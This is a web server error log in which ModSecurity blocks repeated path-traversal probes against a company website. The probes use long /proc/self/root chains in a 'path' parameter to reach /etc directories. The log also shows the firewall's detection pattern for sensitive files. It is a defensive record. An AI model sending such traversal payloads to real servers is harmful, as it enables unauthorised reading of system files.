[Wed Mar 18 11:53:53.379133 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:50608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8gew_le52K8_3pV3rKgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:55:42.366900 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:41734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq87uyqAr6etmhZHNrPYAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:55:44.765875 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:55558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq88NY0UrI5A3LftIy7YwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:56:05.012106 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:55574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9Bcdf6f5d65gmYZTg5AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:56:07.181361 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:39618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9BgkwaGbbGflqUZAbzQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:56:07.182896 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:56858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9BgkwaGbbGflqUZAbzgAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:56:09.972111 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:39632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9Cfu8EFLIOrSqIpsPuQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:56:22.251799 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:45022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9FuyqAr6etmhZHNrPgQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:56:39.003158 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:57980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9J9a6ubjKNq_cu4aoIwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:56:41.454272 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:47474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9KeyqAr6etmhZHNrPkgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:56:42.560669 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:55174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9Ksdf6f5d65gmYZThBgAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:56:45.075503 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:47488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9LSmAPhZkrhU8w4l5ZQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:56:47.573312 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:47490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9L-oXxyEfFpUF8f95tgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:57:17.606746 2026] [mime_magic:error] [pid 19507:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:53770] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/lib/yum
[Wed Mar 18 11:57:18.519931 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:59304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9TtY0UrI5A3LftIy7zwAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:57:19.843145 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:53890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9T8df6f5d65gmYZThEAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:57:19.971256 2026] [access_compat:error] [pid 19507:tid 140411607643904] [client 45.154.98.78:58822] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:57:28.921269 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:53898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9WNa6ubjKNq_cu4aoQQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:57:39.938625 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:36596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9Y-yqAr6etmhZHNrPwgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:57:41.360495 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:56342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9ZdY0UrI5A3LftIy72QAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:57:52.096737 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:54674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9cPu8EFLIOrSqIpsQBQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:57:53.638759 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:56354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9cAkwaGbbGflqUZAcHgAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:57:53.639741 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:51390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9cdY0UrI5A3LftIy74AAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
